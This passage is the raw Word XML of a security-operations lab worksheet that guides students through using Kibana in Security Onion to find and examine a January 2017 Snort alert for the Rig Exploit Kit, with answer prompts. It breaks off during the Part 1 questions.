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10"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="1117"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="Title"/>
          <w15:appearance w15:val="boundingBox"/>
          <w:id w:val="1997218093"/>
          <w:placeholder>
            <w:docPart w:val="590D3D55688E48DDB6EC995446F5394E"/>
          </w:placeholder>
          <w:rPr/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r>
            <w:t xml:space="preserve">Investigating a Malware Exploit</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1117"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1117"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objectives</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this lab you will:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1178"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part 1: Use Kibana to Learn About a Malware Exploit</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1178"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part 2: Investigate the Exploit with Sguil</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1178"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part 3: Use Wireshark to Investigate an Attack</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1178"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Part 4: Examine Exploit Artifacts</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Background / Scenario</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You have been asked to demonstrate your ability to pinpoint the details of an attack in which a computer was compromised. Your goal is to answer a series of questions using Sguil, Kibana, and Wireshark in Security Onion.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You have been given the following details about the event:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1163"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The event happened in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">January of 2017.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1163"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It was discovered by the Snort NIDS.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Required Resources</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1163"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Onion virtual machine </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1163"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internet access</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Instructions</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1101"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use Kibana to Learn About a Malware Exploit</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Part 1, use Kibana to answer the following questions. To help you get started, you are informed that the attack took place at some time during </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">January 2017</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. You will need to pinpoint the exact time.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Narrow the timeframe.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Login to Security Onion with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> username and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cyberops</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the screen size is too small open a terminal window and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hange the Desktop dimesion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">using command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">xrandr -s 1920x1200</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open Kibana (username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">analyst</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cyberops</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and set an Absolute time range to narrow the focus to log data from January 2017.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You will see a graph appear with a single entry showing. To view more details, you need to narro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">w the amount of time that is displayed. Narrow the time range in the Total Log Count Over Time visualization by clicking and dragging to select an area around the graph data point. You may need to repeat this process until you see some detail in the graph.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5030470" cy="1939925"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="Picture 7" descr="Screenshot of dashboard for the time period Jan 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Screenshot of dashboard for the time period Jan 2017. "/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId15"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5030470" cy="1939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6.10pt;height:152.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId15" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use the &lt;Esc&gt; key to close any dialog boxes that may be interfering with your work.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1102"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Locate the Event in Kibana</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After narrowing the time range in the main Kibana dashboard, go to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">NIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alert Data dashboard by clicking NIDS.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5380990" cy="2552700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2" name="Picture 5" descr="screenshot of dashboard filtered for NIDS aler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screenshot of dashboard filtered for NIDS alert data."/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId16"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5380990" cy="2552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3.70pt;height:201.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId16" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zoom in on the even</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t by clicking and dragging in the NIDS – Alerts Over Time visualization further focus in on the event timeframe. Since the event happened over a very short period of time, select just the graph plot line. Zoom in until your display resembles the one below.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5486400" cy="2188845"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3" name="Picture 12" descr="screenshot of dashboard filtered for NIDS alert data zoom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screenshot of dashboard filtered for NIDS alert data zoomed in"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId17"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5486400" cy="2188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172.35pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId17" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Click the first point on the timeline </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to filter for only that first event.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1213"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5436870" cy="1678940"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4" name="Picture 14" descr="screenshot of the first even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screenshot of the first event highlighted"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId18"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5436870" cy="16789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8.10pt;height:132.20pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId18" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now view details for the events that occurred at that time. Scroll all the way to the bottom of the dashboard until you see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">NIDS Alerts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">section of the page. The alerts are arranged by time. Expand the first event in the list by clicking the pointer arrow that is to the left of the timestamp.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1173"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5473700" cy="1865630"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5" name="Picture 15" descr="A screenshot of results of NIDS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screenshot of results of NIDS alerts"/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId19"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5473700" cy="18656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1.00pt;height:146.90pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId19" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Look at the expanded alert details and answer the following questions:</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What is the time of the first detected NIDS alert in Kibana?</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the source IP address in the alert?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the destination IP address in the alert?</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the destination port in the alert? What service is this?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the classification of the alert?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the destination geo country name?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Notice the information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">field of the alert. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind w:firstLine="0" w:left="720"/>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">provides information from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Emerging Threats Snort alert rule for the exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> kit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigate this rootkit (Rig Exploit Kit) online to find out more about it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questions:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing w:before="0"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">When was the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rig Exploit Kit (Rig EK) first discovered?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
